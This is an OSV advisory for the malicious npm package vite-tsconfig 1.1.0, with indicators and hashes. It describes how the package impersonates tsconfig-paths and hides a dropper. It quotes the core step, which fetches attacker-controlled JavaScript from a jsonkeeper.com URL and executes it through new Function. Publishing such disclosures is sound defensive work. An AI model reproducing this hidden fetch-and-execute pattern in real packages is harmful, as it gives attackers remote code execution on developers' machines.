MAL-2026-5576

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-tsconfig/MAL-2026-5576.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5576
Published
2026-06-11T05:21:54Z
Modified
2026-06-11T05:46:32.643797259Z
Summary
Malicious code in vite-tsconfig (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (142b4a600291ebf355bb7915c082c34b329e58026dc3c1f181a5b1865c16cff9)

The package is named vite-tsconfig and replicates the public API of the legitimate tsconfig-paths library (register, loadConfig, createMatchPath, matchFromAbsolutePaths), but adds an extra exported function configJson that is not present upstream. When a consumer calls configJson(), lib/config-loader.js spawns a detached, stdio-suppressed node lib/mapProps.js child process (child_process.spawn with detached:true and child.unref()). lib/mapProps.js then issues axios.get('https://www.jsonkeeper.com/b/5IZTJ') with header x-secret-key: _, takes response.data.Cookie, and executes it as JavaScript with full Node capability via new Function('require', s)(require) — retried up to 5 times. jsonkeeper.com is an anonymous public JSON paste host, so the executed payload is mutable and attacker-controlled, giving the publisher arbitrary remote code execution on any machine where a consumer invokes the documented configJson API. The remote URL is camouflaged as DEV_API_KEY inside a fake process.env shadow object, and the loader is wrapped in pino-logger-shaped config (messageKey/levels in lib/config-loader.js) to disguise the dropper. README references vite-json and dividab/tsconfig-paths, confirming the impersonation framing.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005599",
            "import_time": "2026-06-11T05:41:11.175888394Z",
            "sha256": "142b4a600291ebf355bb7915c082c34b329e58026dc3c1f181a5b1865c16cff9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T05:21:54Z",
            "versions": [
                "1.1.0"
            ]
        }
    ]
}
Affected packages

npm / vite-tsconfig

Affected versions

1.*
1.1.0

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "lib/mapProps.js",
            "sha256": "c3c20201b376f76b2f4c08ed64da39f703448f318f584f358007591ad3f9bcd0",
            "tlsh": "1c21124f757ca0a8017013f5a72be426f965643f300290d5739cc7a21f3655da182fde"
        },
        {
            "path": "lib/config-loader.js",
            "sha256": "94c1ab6d8ceb818c37f7cd023dcbf42d4e0513874b9ec3306f1f3b7ad9625c81",
            "tlsh": "5d81435b6ad4a9e600b19b64d62bd016ff702f77230680a2793cd1d41f39844a1e6efa"
        }
    ],
    "package_integrity": [
        {
            "filename": "vite-tsconfig-1.1.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-9KV5foA7sax35F5hcVBu8eAb5f1c+79CzQrV81Kktx7wrTF5Z7rOynTfHZf0T0Cb9qi9ghA9mr9AZwSLmNljWA==",
                "sha1": "d47d8cc3c868762e31da685a407b3f3d3c94b2e8"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-tsconfig/MAL-2026-5576.json"